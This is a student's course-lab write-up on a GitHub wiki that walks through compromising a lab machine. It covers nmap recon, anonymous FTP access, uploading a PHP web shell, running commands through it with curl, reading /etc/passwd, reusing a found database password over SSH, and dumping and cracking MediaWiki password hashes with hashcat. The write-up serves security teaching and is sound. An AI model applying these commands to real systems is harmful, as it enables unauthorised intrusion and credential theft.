Week 7 File Vulnerability (SEC 335) - Chromosom3/TechNotes GitHub Wiki
Reflection
When looking at the mistakes that Pippin’s system administrator(s) made one stands out above the others. Having an anonymous FTP server that allows file uploads. This is what allowed me to gain an initial foothold on the system. This opens up the system to a ton of risk. The other large mistake was the reuse of passwords. When I got FTP access to the system I was able to find the SQL database’s root user password. This also turned out to be the SSH password for the peregrin.took user account. From here I had SSH and database root access. Looking in the database I found a password for a web app user. This web app user’s password was also the password for the root user. In addition to reusing passwords the passwords that were used were weak.
Prelab Webshell Assignment
Before beginning work on the lab, I did the assignment on web shells as recommended by the instructor. This assignment was relatively simple and consisted of setting up a PHP web server with a web shell. Once that was set up I practiced different types of code execution using the web shell.
Using the command php -S 127.0.0.1:8090 -t . I started a web shell in my current directory listening on localhost port 8090. This directory contained a simple PHP web shell that was copied from /usr/share/webshells/php/simple-backdoor.php. Once the web server was running with the web shell in place I used the command curl -v 127.0.0.1:8090/simple-backdoor.php?cmd="ip+a;whoami;echo+'ping%20%2Dc%201%20google.com'>script.sh;chmod+777+script.sh;./script.sh" to execute code via the web shell. Below is a breakdown of what the command is doing.
# The first part of the command is telling curl to connect to the web server at the IP port and URL below
curl -v 127.0.0.1:8090/simple-backdoor.php
# The latter half of the URL (? and after) contains the GET parameters you are sending to the server.
?cmd="ip+a;whoami;echo+'ping%20%2Dc%201%20google.com'>script.sh;chmod+777+script.sh;./script.sh"
# In this case we are sending the following as the "cmd" value.
ip+a;whoami;echo+'ping%20%2Dc%201%20google.com'>script.sh;chmod+777+script.sh;./script.sh
# Note for the web shell we need to change space to + (%20 might work as well)
# That means the command is actually this:
ip a;whoami;echo 'ping%20%2Dc%201%20google.com'>script.sh;chmod 777 script.sh;./script.sh
# Looking at this we can see this is actually 5 commands separated by ;
ip a # Returns IP information via the curl
whoami # Returns user information via the curl
echo 'ping%20%2Dc%201%20google.com'>script.sh # Creates a script.sh file on the remote system
# Note: The above command is using URL encoding to change values in the ping command. The decoded command is seen below.
ping -c 1 google.com # Pings google
chmod 777 script.sh # Changes the script permissions to be executable
./script.sh # Executes the script. The results are returned in to curl
Link on url encoding: http://www.cheat-sheets.org/sites/html.su/urlencoding.html
The image below shows the successful execution of the commands above.
File Vulnerability Lab
Recon
The first step was to perform recon on the target (10.0.5.25). Using the command nmap 10.0.5.25 -A I was able to get three services running on the system. The -A flag specifies that nmap should “Enable OS detection, version detection, script scanning, and traceroute”. The results of this command can be seen below in the image.
From the Nmap scan, we can see that there is a web server, FTP server, and SSH on the system. Nmap also indicated that the FTP server has anonymous authentication enabled. We can use the command ftp -a 10.0.5.25 to connect to the server anonymously. We can then use the ls to list the contents of the root FTP directory. For more information on the ftp command use this link (https://linux.die.net/man/1/tnftp).
Looking at ls command output in the image above we can see that the “upload” directory has permissions set to 777. This means that not only the owner and group have full permissions to read, write, and execute but everyone does. After poking around in the directories for a bit two files of interest were found. Using the following commands I was able to download the files of interest.
ftp -a 10.0.5.25
get LocalSettings.php
cd includes
get DefaultSettings.php
exit
Using grep and parsing the files manually I was able to get information about the Mediawiki and SQL service. The images below show some of the useful information.
DefaultSettings.php:
LocalSettings.php:
Explotation
Going back to the FTP server we can attempt to upload a web shell to the “upload” directory. This is done with the following commands.
ftp -a 10.0.5.25
cd upload
put ./webshell/navarro.php navarro.php
Note the first file path for the put command is the local path and the second is the remote path. If you don’t specify a remote path it will use the local path. The results of these commands can be seen below in the two images. The first shows the put command working and the second is a directory listing after the upload.
Now that the file has been uploaded it can be found at http://10.0.5.25/upload/navarro.php. This means we can take the lessons learned from the prelab assignment to get remote code execution on the target system. Using the command curl -v 10.0.5.25/upload/navarro.php?cmd="cat+/etc/passwd" we can see all the users on the remote system. This is shown in the image below.
One notable account is seen on the last line of the /etc/passwd file. That line reads peregrin.took:x:1001:1001::/home/peregrin.took:/bin/bash. Now we have a user on that system we can target. In our recon, we did find a password. It was set for the SQL database but we can attempt to log in with the user we found and that password. Doing so reveals that passwords are being reused and we now have a foothold on the system.
From our recon looking at the MediaWiki configuration, we know that there is a database on this system. We can connect using the following command mysql -u root -p, at the prompt enter the SQL password that was found on in the configuration file. Next, the following commands can be used.
# Shows all the databases on the SQL server
show databases;
# Select the MediaWiki database and use that for future commands
use mediawiki;
# Show all the tables for the current database
show tables;
# Select everything from the user table
select * from user;
The above commands result in an output from the SQL server that looks similar to the one below.
+---------+-----------+----------------+-------------------------------------------------------------------------------------------------------------------------------------------+------------------+-------------------+------------+----------------+----------------------------------+--------------------------+----------------------------------+--------------------------+-------------------+----------------+-----------------------+
| user_id | user_name | user_real_name | user_password | user_newpassword | user_newpass_time | user_email | user_touched | user_token | user_email_authenticated | user_email_token | user_email_token_expires | user_registration | user_editcount | user_password_expires |
+---------+-----------+----------------+-------------------------------------------------------------------------------------------------------------------------------------------+------------------+-------------------+------------+----------------+----------------------------------+--------------------------+----------------------------------+--------------------------+-------------------+----------------+-----------------------+
| 1 | Pippin | | :pbkdf2:sha512:30000:64:7zMbdjXKrFDDq4CRF5q9ow==:49ImFWdWRVz2dCDsJPj+P0Xovz153VenjKk7npuK7u5xgo21IUh+eY0QH8fQxdH/Cjx3zxZyQcfNChAnP11GNg== | | NULL | | 20220803113106 | 28973ed8b0f0f0a1523c81ee60f1943a | NULL | | NULL | 20220803113059 | 0 | NULL |
| 2 | 1234 | | :pbkdf2:sha512:30000:64:RF3BGQ6mFJJQr5d7v8teFw==:rMX+DEQRv2Ntwxx/PLVKbHo82gt/062BnmCcbKqQaBq2aOhxaOwz4U7E6gi0m1jUglQgV67AE+jjb5couiGyDQ== | | NULL | | 20221018161536 | 9d25ea139fdeabdd76a3d4561cfe08ee | NULL | | NULL | 20221018161530 | 0 | NULL |
| 3 | Navarro | | :pbkdf2:sha512:30000:64:Nrqxb76L20Xh0qVjT32zOw==:uoBliqUr2FOs0g2hQoRfhKZEqvo9V2LEyIg1kQxJ3S0B0BgBPfa940x4OtsWpFmzM2DKcZbSs1ig/4ZW7N88pQ== | | NULL | | 20221023014216 | 158a47a1a51d70517fa6e92e7a5b1f55 | NULL | | NULL | 20221023014210 | 0 | NULL |
+---------+-----------+----------------+-------------------------------------------------------------------------------------------------------------------------------------------+------------------+-------------------+------------+----------------+----------------------------------+--------------------------+----------------------------------+--------------------------+-------------------+----------------+-----------------------+
In this output, we can see that there is a MediaWiki user named “pippin” and their password hash can also be seen. The system administrators are reusing passwords so this hash will be saved and cracked. We can attempt to use hashcat to crack this password but first, we need to set up the hash file. The hash in the database is :pbkdf2:sha512:30000:64:7zMbdjXKrFDDq4CRF5q9ow==:49ImFWdWRVz2dCDsJPj+P0Xovz153VenjKk7npuK7u5xgo21IUh+eY0QH8fQxdH/Cjx3zxZyQcfNChAnP11GNg==. The first value and the fourth value need to be removed so we end up with sha512:30000:7zMbdjXKrFDDq4CRF5q9ow==:49ImFWdWRVz2dCDsJPj+P0Xovz153VenjKk7npuK7u5xgo21IUh+eY0QH8fQxdH/Cjx3zxZyQcfNChAnP11GNg==. This will now work with hashcat as long as you use the 12100 method. The full command would be hashcat -m 12100 hash.txt -w 4 -a 0 wordlist.txt
Once the password is cracked we can attempt to elevate to root. Using that password we can elevate to root.
Hashcat on Windows with GPU
To expedite the process of cracking the password hash we can leverage our GPUs. In this section, I will cover how to configure hashcat to leverage a GPU on Windows. This will cover specifically setting up an NVIDIA GPU on Windows. You need to first download the CUDA toolkit. You can download it from https://developer.nvidia.com/cuda-downloads. This will also download your GPU drives. Once this is installed you can run hashcat -I to ensure the device is being detected. Finally, you can run hashcat -b to benchmark hashcat with your GPU.